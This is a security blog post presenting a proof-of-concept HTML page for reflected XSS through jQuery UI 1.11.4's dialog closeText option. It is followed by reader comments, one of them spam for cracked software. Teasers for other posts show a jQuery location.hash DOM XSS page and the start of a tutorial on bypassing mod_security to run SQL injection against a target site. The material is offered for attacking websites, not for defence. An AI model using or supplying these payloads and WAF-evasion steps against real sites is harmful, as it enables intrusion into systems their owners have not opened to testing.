JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4 

I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it.

So, here is a Code which will explain how to exploit vulnerabilities like these.

Place the script on dialog function as shown in the Code below.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>XSS in closeText option of component ui dialog</title>

    <script src="https://code.jquery.com/jquery-2.1.4.js"></script>
    <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
 
    <script>
        $(document).ready(function () {
            $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' });
        });
    </script>
</head>
<body>
    <div id="dialog" title="Dialog Title">Content here!</div>
</body>
</html>

Comments

  1. Anon7:17 pm, March 06, 2018

    How to check for some target url (eg: http://example.com/site/js/jquery-ui.js) ??

    ReplyDelete
  2. Little Shop with Gucci10:24 am, February 13, 2019

    If we use the default defined closetext message, there will not be impact correct?

    ReplyDelete
  3. Unknown2:52 pm, October 11, 2019

    how to exploit?? like if you want to make a poc for a program what do you submit to them??

    ReplyDelete
  4. Muhammad Zohaib10:19 pm, December 15, 2021

    Many thanks for sharing such incredible knowledge Of TagSpaces Crack. It's really good for your Website.
    The info on your website inspires me greatly. This website I'm bookmarked. Maintain it and thanks again.
    I'm really impressed with your writing skills, as smart as the structure of your weblog.

    Acunetix Crack

    ReplyDelete

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <
Read more

Bypass Mod_Security

Image
This topic is similar as Manual Sql Injection. But mod_security are protect to hack website. You can see in this screenshot. Now In this tutorial we can learn how to bypass mod_security First we need one Target Website In My case I am using this website: http://www.target.com.pk Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this: Code: http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error) Finding Vulnerable Columns So now that you got the amount of columns, you're going to want to see
Read more